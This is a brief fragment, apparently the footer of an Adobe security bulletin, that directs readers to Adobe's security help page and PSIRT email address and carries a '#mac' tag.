For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

Tag

#mac